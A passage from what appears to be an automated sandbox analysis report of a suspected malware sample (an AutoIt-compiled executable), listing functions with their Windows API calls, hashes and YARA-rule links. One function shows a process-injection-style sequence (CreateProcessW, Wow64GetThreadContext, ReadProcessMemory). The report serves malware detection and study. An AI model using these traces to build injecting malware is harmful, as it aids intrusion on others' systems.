              • CloseHandle.KERNEL32(00000000,?,001E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E9B62
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: File$CloseCreateHandleTime
              • String ID:
              • API String ID: 3397143404-0
              • Opcode ID: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
              • Instruction ID: 872b18c9235e13be5e0383ec5e4255b7e9bcdb6c60610048bdca9d92da8392ea
              • Opcode Fuzzy Hash: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
              • Instruction Fuzzy Hash: 9DE086321C0314B7D7311B54FC0DFCE7B18AB05B71F104120FB14690E187B1251197D8
              Function 001E8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 001E8FA5
                • Part of subcall function 001A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9C64), ref: 001A2FA9
                • Part of subcall function 001A2F95: GetLastError.KERNEL32(00000000,?,001A9C64), ref: 001A2FBB
              • _free.LIBCMT ref: 001E8FB6
              • _free.LIBCMT ref: 001E8FC8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
              • Instruction ID: 9b80c890b62414c8573ae6446ee80d216c951f2f6fbe671011e0b00b8c3a2fff
              • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
              • Instruction Fuzzy Hash: D3E017A1709B414ECA24A67EAD40A9B67EE5F89360B18081EF80EDB182DF34EC418128
              Function 0018AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: CALL
              • API String ID: 0-4196123274
              • Opcode ID: 060f3ffef272b35da3b904bfab278ce52c9da2d2f8d51bd09aad163b5fea3e5d
              • Instruction ID: 9d370eecb7510a9e36ccd2f79ae515b1f5463fee858ef16aedebca8e5e031fab
              • Opcode Fuzzy Hash: 060f3ffef272b35da3b904bfab278ce52c9da2d2f8d51bd09aad163b5fea3e5d
              • Instruction Fuzzy Hash: 00224874508241DFD729EF14C494B2ABBE1BF59300F55895EF8968B262D731EE81CF82
              Function 0018492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
              Download Yara Rule
              APIs
              • IsThemeActive.UXTHEME ref: 00184992
                • Part of subcall function 001A35AC: __lock.LIBCMT ref: 001A35B2
                • Part of subcall function 001A35AC: DecodePointer.KERNEL32(00000001,?,001849A7,001D81BC), ref: 001A35BE
                • Part of subcall function 001A35AC: EncodePointer.KERNEL32(?,?,001849A7,001D81BC), ref: 001A35C9
                • Part of subcall function 00184A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00184A73
                • Part of subcall function 00184A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00184A88
                • Part of subcall function 00183B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B7A
                • Part of subcall function 00183B4C: IsDebuggerPresent.KERNEL32 ref: 00183B8C
                • Part of subcall function 00183B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002462F8,002462E0,?,?), ref: 00183BFD
                • Part of subcall function 00183B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00183C81
              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001849D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
              • String ID:
              • API String ID: 1438897964-0
              • Opcode ID: 88f16c2949006f1cb0b63b4c81a253c275d5efd2bcf0087be00d3f3d0f336ce4
              • Instruction ID: 3a64a805f71970e5f966798042b2d4782f3de084e07e0ee343efd39790fdb654
              • Opcode Fuzzy Hash: 88f16c2949006f1cb0b63b4c81a253c275d5efd2bcf0087be00d3f3d0f336ce4
              • Instruction Fuzzy Hash: 19119A75908311AFC310EF68EC4991AFBF8EBAA750F00451EF455872B1DBB09A49CF92
              Function 00185DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00185981,?,?,?,?), ref: 00185E27
              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00185981,?,?,?,?), ref: 001BE19C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e422bfb86763879cec5d24b65ecff5186acfefde52b42b3f1f1b4d54604abbc0
              • Instruction ID: a384cc5f6896a4ad94c6d3235ba953e48cd54a29f0ae673054fa42b1e95b0bbe
              • Opcode Fuzzy Hash: e422bfb86763879cec5d24b65ecff5186acfefde52b42b3f1f1b4d54604abbc0
              • Instruction Fuzzy Hash: 99019271284708BEF7245E28DC8AFA67BDDEB01768F108318FAE55A1E1C7B01E498F50
              Function 001A0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 001A594C: __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001A594C: __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001A594C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              • std::exception::exception.LIBCMT ref: 001A102C
              • __CxxThrowException@8.LIBCMT ref: 001A1041
                • Part of subcall function 001A87DB: RaiseException.KERNEL32(?,?,?,0023BAF8,00000000,?,?,?,?,001A1046,?,0023BAF8,?,00000001), ref: 001A8830
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
              • String ID:
              • API String ID: 3902256705-0
              • Opcode ID: 952603e724c67129836c6194924c423d975f86541dff661fc0c14b1b8a1959c8
              • Instruction ID: 2e6d43bbd1aedbdf6eaf1f064930ed57a4285352b882a19bb67de33f3aeaaa1e
              • Opcode Fuzzy Hash: 952603e724c67129836c6194924c423d975f86541dff661fc0c14b1b8a1959c8
              • Instruction Fuzzy Hash: 7BF0A47D500319B6CB21AE98ED059DF7BA89F22350F200425F814A6592DFB18AE486E0
              Function 001A582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __lock_file_memset
              • String ID:
              • API String ID: 26237723-0
              • Opcode ID: 01073c3224c8c6f347d4820c2127cb1f7ea56512c3befe94fa3ac224d3f4667f
              • Instruction ID: f951ea1fd12655228ca229f1e27fda85b84351e7b477d745b418d86fa0592b4d
              • Opcode Fuzzy Hash: 01073c3224c8c6f347d4820c2127cb1f7ea56512c3befe94fa3ac224d3f4667f
              • Instruction Fuzzy Hash: 1901A779C04609EBCF22AF6A8C0559F7B72AF53760F144215F8245B1A1DB358A21DB91
              Function 001A55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • __lock_file.LIBCMT ref: 001A561B
                • Part of subcall function 001A6E4E: __lock.LIBCMT ref: 001A6E71
              • __fclose_nolock.LIBCMT ref: 001A5626
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
              • String ID:
              • API String ID: 2800547568-0
              • Opcode ID: 4ad58bdb1980ee7418ce7f9f2f6bb881b12f3ff5e1b629a8b397e4464a6be444
              • Instruction ID: 263b5c771ce9b8160a1a544a0bebcfce7fa3b33834f3f67cf49afa867d1cda25
              • Opcode Fuzzy Hash: 4ad58bdb1980ee7418ce7f9f2f6bb881b12f3ff5e1b629a8b397e4464a6be444
              • Instruction Fuzzy Hash: 5DF0B479804B059ED721AF79880276E77B26F63334F558209E418AB1C2CF7C89019B55
              Function 014012FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01401ABB
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01401B51
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01401B73
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
              • Instruction ID: 10a932e86f4a82bdb033393677d131bfb9b273aaba52a8aa0ffa33a237f4e4a4
              • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
              • Instruction Fuzzy Hash: 7812DD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7E5E77A4E81CF5A
              Function 00192123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a6a5500596a0c8a47e6277ae989396da2c42de55b6840e564bd4582c7f840660
              • Instruction ID: 4ab2423d6171c13288229f0ed9b3b1accec8afb4513035526f58965353b72e99
              • Opcode Fuzzy Hash: a6a5500596a0c8a47e6277ae989396da2c42de55b6840e564bd4582c7f840660
              • Instruction Fuzzy Hash: 66517F35600604AFCF14FB64C991FBE77A6AFA5314F158068F906AB392DB30EE00CB51
              Function 00185C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
              Download Yara Rule
              APIs
              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00185CF6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e2b24bdda3ae9b6e7fe0fb113eefd9040d3044a9d9e20806a56c2d934bbb5706
              • Instruction ID: 07bd54efce6050ab5baa79b98adf7cdbd3447e56b7aeca4d3247f839fc0fe043
              • Opcode Fuzzy Hash: e2b24bdda3ae9b6e7fe0fb113eefd9040d3044a9d9e20806a56c2d934bbb5706
              • Instruction Fuzzy Hash: 96311C71A00B19AFCB18EF6DC4846ADB7B6FF48310F158629E81993710D771AA50DF90
              Function 001C00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID:
              • API String ID: 1473721057-0
              • Opcode ID: e78fa8038a35d205e7460d60caed5464628f0708dfdb1ca6e6a3f03c0cdeaf0a
              • Instruction ID: 6c9bfbd7704653127f1b7ed9e99673be127c710b76ce0d0e4b6cb170471b4551
              • Opcode Fuzzy Hash: e78fa8038a35d205e7460d60caed5464628f0708dfdb1ca6e6a3f03c0cdeaf0a
              • Instruction Fuzzy Hash: 47414674508341CFDB24DF14C484B1ABBE0BF59318F1989ACE89A8B762C332E985CF52
              Function 00185B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: feb66267ce8dae7d3d05077f914b0a3e9c87bbf6eddcaa6f8bfaf92840c974de
              • Instruction ID: ae1d78cf5b30f92d3791078ea938f7cb96d9f99c56ab89c211887d87cf2e019d
              • Opcode Fuzzy Hash: feb66267ce8dae7d3d05077f914b0a3e9c87bbf6eddcaa6f8bfaf92840c974de
              • Instruction Fuzzy Hash: 8F21D230A00A08EBDB146F55F8896EA7FF9FF24380F21846AF886D1411EB7095E08B45
              Function 00184F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00184D13: FreeLibrary.KERNEL32(00000000,?), ref: 00184D4D
                • Part of subcall function 001A548B: __wfsopen.LIBCMT ref: 001A5496
              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184F6F
                • Part of subcall function 00184CC8: FreeLibrary.KERNEL32(00000000), ref: 00184D02
                • Part of subcall function 00184DD0: _memmove.LIBCMT ref: 00184E1A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Library$Free$Load__wfsopen_memmove
              • String ID:
              • API String ID: 1396898556-0
              • Opcode ID: 51aeac1763226b0d39573c2523939e50801e43a59e12f6df6e66b95a720a9861
              • Instruction ID: 54bc6df20122d525b182ca8ac77eb54c644b117e1b7ca5426c3741d0e26b7920
              • Opcode Fuzzy Hash: 51aeac1763226b0d39573c2523939e50801e43a59e12f6df6e66b95a720a9861
              • Instruction Fuzzy Hash: BD11C431600706ABCB14FF74D812FAE77A99F54714F10842DF941A61C2EF759B159F60
              Function 001C01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID:
              • API String ID: 1473721057-0
              • Opcode ID: bb91433f5432e36e24ef4b9744155427560d25fafd5cd84d339d5876813c08e3
              • Instruction ID: 37a680c94d5e5310335b4d1745f086511ce26bae17a00d548b2ccd22ed4c72a8
              • Opcode Fuzzy Hash: bb91433f5432e36e24ef4b9744155427560d25fafd5cd84d339d5876813c08e3
              • Instruction Fuzzy Hash: C6212EB4508341DFDB24EF54C484B1ABBE0BF88304F09896CE89A47722D731E845CF52
              Function 00185D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
              Download Yara Rule
              APIs
              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00185807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00185D76
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 012fd1fd358eefe8eb57387888d22a5078b1e34fa82588af833f82eebec31cb9
              • Instruction ID: e7755b09ec06ea0499e726e3f596c0bd7da48d9eb7534538412e667dfda70aa8
              • Opcode Fuzzy Hash: 012fd1fd358eefe8eb57387888d22a5078b1e34fa82588af833f82eebec31cb9
              • Instruction Fuzzy Hash: EE113A31200B019FD3309F55C488B66B7E6EF45764F10CA2EE8AA86A51D7B1FA45CF60
              Function 00185BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
              • Instruction ID: 632243ccfa2324e207ace6a4b2a1947bf25521325201685faea1eb8e031397f4
              • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
              • Instruction Fuzzy Hash: B801A779600541AFC305EB29C851D66FBAAFF9A3107148159F815C7702D731FD21CBE0
              Function 001A4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
              Download Yara Rule
              APIs
              • __lock_file.LIBCMT ref: 001A4AD6
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __getptd_noexit__lock_file
              • String ID:
              • API String ID: 2597487223-0
              • Opcode ID: aebd22211896d9b3c2ff34ae5641405661c6a0d8b58410b2854fc725d1244fa9
              • Instruction ID: 44d84721d43956bdce0c6af108b435f0ec85a2e62a7e214455452006dd4ec24c
              • Opcode Fuzzy Hash: aebd22211896d9b3c2ff34ae5641405661c6a0d8b58410b2854fc725d1244fa9
              • Instruction Fuzzy Hash: FAF0C8399402099BDF51AFB4CC063EF7661AF52329F044514F414AB1D1CBB88960DF55
              Function 00184FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(?,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184FDE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FreeLibrary
